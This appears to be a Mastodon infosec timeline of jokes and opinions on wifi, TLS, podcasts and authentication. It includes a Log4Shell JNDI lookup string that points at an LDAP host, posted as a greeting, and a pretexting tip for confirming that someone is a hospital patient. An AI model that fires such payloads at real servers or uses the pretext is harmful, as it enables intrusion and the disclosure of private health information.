Hot take: "public wifi is bad, you *will* get owned if you use it" is outdated advice, especially given that TLS is now considered mandatory, not just "standard"

The VPNs being sold with this outdated advice are statistically more likely to be a security threat than your coffeeshop's wifi

r000t boosted

good morning my fellow java developers

I wish you a very ${jndi:ldap://192.168.15.69:1420/a}

r000t boosted
r000t boosted

Help me prove a point to a colleague:

If your corporate computer (or school computer, or pretend you work for a place that issues computers) normally asks you to press ctrl+alt+del before logging on:

1) Would you ever notice if you *weren't* asked to do that, just once?

2) If you did notice, what would you do?

r000t boosted

Tired: Thanksgiving
Wired: Harvest festivals
Inspired: Credential Harvesting Festivals

Selling educational materials for educational purposes only is still legal. Just saiyan.

Alternatively, giving away cyberattack tools is based and GNUpilled

r000t boosted
r000t boosted

Time Magazine cover in 2010th and now future cover of October TIME Magazine cover
Time to die, Mark

YOUR
INTERNAL
SERVICES
STILL
NEED
TLS

YOUR
LAN
SHOULD
BE
ASSUMED
TO
BE
HOSTILE

r000t boosted

pam-duress: A Pluggable Authentication Module (PAM) which allows the establishment of alternate passwords that can be used to perform actions to clear sensitive data, notify IT/Security staff, close off sensitive network connections, etc if a user is coerced into giving a threat actor a password.

github.com/nuvious/pam-duress

r000t boosted

A "podcast" behind a paywall is not a podcast.

A "podcast" that only one app can receive is not a podcast.

A "podcast" without a public feed that can be freely pulled into any podcast client or RSS reader is not a damn podcast, don't let people get away with calling it that.

Bypass HIPAA with oracles...

Dont ask: "Is John Nuckinfutz there?"

Do ask: "Can you transfer me to John Nuckinfutz's room?"

A complete dumpster fire from start to finish, and WD has absolutely no plans to put it out.

But you can always buy a new dumpster. From us, please.

r000t boosted

Windows 10 running Ubuntu 21.04 running Windows 7 running Mac OS 8.5 running Windows 95

r000t boosted
Show older
Infosec Exchange

A Mastodon instance for info/cyber security-minded people.